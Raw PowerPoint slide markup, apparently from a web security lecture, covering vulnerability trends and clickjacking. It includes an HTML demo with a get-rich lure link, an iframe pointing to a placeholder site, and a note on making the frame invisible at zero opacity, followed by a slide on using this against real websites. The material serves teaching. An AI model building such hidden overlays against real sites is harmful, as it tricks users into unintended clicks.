              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill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0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill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0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>rich</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>now:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="744220" indent="-731520">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434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743585" algn="l"/>
                <a:tab pos="744220" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;iframe 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sr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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>c="ht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t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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>p://w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ww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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>.xyz.come"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-170" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="458470" indent="-445770">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430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457834" algn="l"/>
                <a:tab pos="458470" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430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800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="18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1270" marR="5080" indent="-379857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Displaying </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0"/>
              <a:t>zero </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>opacity </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>level </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>your  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239011" y="1917954"/>
            <a:ext cx="7514843" cy="43144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02208" y="2121244"/>
            <a:ext cx="2540000" cy="635000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2540000" h="635000">
                <a:moveTo>
                  <a:pt x="2539746" y="326299"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2539746" y="317155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2538984" y="308011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2521794" y="263736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2476854" y="216253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2410732" y="174489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370875" y="155650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2327098" y="138121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2279861" y="121860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229623" y="106826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2176841" y="92980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121976" y="80282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2065485" y="68690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007827" y="58164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1949461" y="48665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1890847" y="40151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1832441" y="32582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1774705" y="25918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1718095" y="20119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1663071" y="15144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1610092" y="10952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559276" y="7484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1512103" y="4759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468010" y="2676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1427797" y="1216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1360845" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1169546" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111740" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1071473" y="2718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1027333" y="4806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979778" y="7555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="929266" y="11006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="876257" y="15200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821207" y="20178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764575" y="25982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="706820" y="32651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648399" y="40226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589771" y="48750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531393" y="58261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="473725" y="68803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417224" y="80414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362349" y="93137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309558" y="107013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259308" y="122081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212059" y="138383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168268" y="155960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128394" y="174853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92895" y="195102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36853" y="239835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3809" y="290485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="308773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="317917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11430" y="362875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25146" y="381028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25146" y="317155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26670" y="303439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55632" y="255561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94763" y="223949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143817" y="195922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197975" y="171754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252464" y="151703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302334" y="136085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342900" y="125131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384048" y="114463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427481" y="104557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478070" y="93903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529057" y="84183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580392" y="75359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632026" y="67395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="683909" y="60254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735990" y="53900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="788221" y="48296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840552" y="43406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="892933" y="39192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945433" y="35612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="997888" y="32638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050187" y="30235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102263" y="28365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154050" y="26990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1205484" y="26071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1270254" y="25309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1391922" y="26758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1461516" y="29151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1509929" y="31186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559616" y="33714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1608755" y="36684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1658322" y="40199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1707938" y="44277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1757560" y="48962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1807147" y="54293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856657" y="60311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1906050" y="67058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955283" y="74574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2004315" y="82901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053105" y="92079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2101612" y="102149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2149793" y="113153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2197608" y="125131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2236470" y="135799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2273808" y="147229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2313209" y="161086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2359973" y="179422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2408643" y="202265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2453766" y="229641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2489887" y="261579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2511552" y="298105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2513838" y="311821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514600" y="317917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514600" y="381940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2515926" y="380482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2531548" y="354202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539746" y="326299"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2540000" h="635000">
                <a:moveTo>
                  <a:pt x="2514600" y="381940"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2514600" y="317917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2513076" y="331633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2500524" y="357107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2455092" y="403640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2423332" y="424773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2386288" y="444534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344522" y="462958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2298592" y="480082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2249059" y="495945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196482" y="510582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2141422" y="524030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2084439" y="536327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2026092" y="547509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966942" y="557614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1907547" y="566678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1848469" y="574737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1790268" y="581830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1733502" y="587993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1678732" y="593262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1626519" y="597675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1577421" y="601269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1531999" y="604080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1490813" y="606146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1423389" y="608189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1391922" y="608314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269492" y="609763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1204722" y="608988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153847" y="608102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101962" y="606714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1049878" y="604810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="997646" y="602361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945314" y="599338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="892886" y="595708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840314" y="591430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787783" y="586482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735358" y="580832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="683104" y="574452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631089" y="567309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579377" y="559375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528034" y="550618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="477126" y="541008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426720" y="530515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384048" y="520609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342138" y="509941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301412" y="498591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252420" y="483162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199554" y="463839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146944" y="440708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98895" y="413921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59669" y="383614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="349921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25908" y="323251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25146" y="317155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25146" y="381028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68857" y="423835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108861" y="449540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153662" y="472249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201212" y="492102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249464" y="509238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296370" y="523800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339881" y="535925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="377952" y="545755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422148" y="555661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467868" y="565567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="517402" y="574739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="567075" y="583172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616875" y="590885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666789" y="597899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716805" y="604234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766912" y="609911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="817096" y="614949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="867346" y="619369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="917650" y="623191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967995" y="626436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018369" y="629123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1068760" y="631274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1119157" y="632907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1169546" y="634044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1219915" y="634705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269492" y="634906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1335024" y="634909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1399032" y="633385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1460754" y="631127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468010" y="631034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1515416" y="629935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591430" y="625877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1636257" y="622660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1684847" y="618597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736610" y="613648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1790958" y="607770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1847301" y="600924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905051" y="593068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1963620" y="584162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2022417" y="574165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2080855" y="563035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2138345" y="550732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194297" y="537216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2248124" y="522445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2299236" y="506378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2347044" y="488975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2390960" y="470194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2430395" y="449996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2464761" y="428338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2493467" y="405180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514600" y="38194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59</a:t>
            </a:fld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293873" y="616711"/>
            <a:ext cx="532130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spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="04617A"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="04617A"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>security vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="04617A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4617A"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>trend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96694" y="5428742"/>
            <a:ext cx="60775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onstantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://info.cenzic.com/rs/cenzic/images/Cenzic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>‐Application‐  Vulnerability‐Trends‐Report‐2013.pdf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948433" y="1864614"/>
            <a:ext cx="5476494" cy="29337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094216" y="6805633"/>
            <a:ext cx="135890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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:fld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22957" y="769111"/>
            <a:ext cx="641413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Clickjacking </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>examples </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>in the</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="135" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>real‐world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70102" y="1765808"/>
            <a:ext cx="8004809" cy="36849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245745" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Could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spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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apply</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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basic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-85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technique</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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hiding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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real‐world  website</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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and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entice</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-14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victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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click</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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link?</a:t>
            </a:r>
            <a:endParaRPr sz="24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540"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-70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…</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
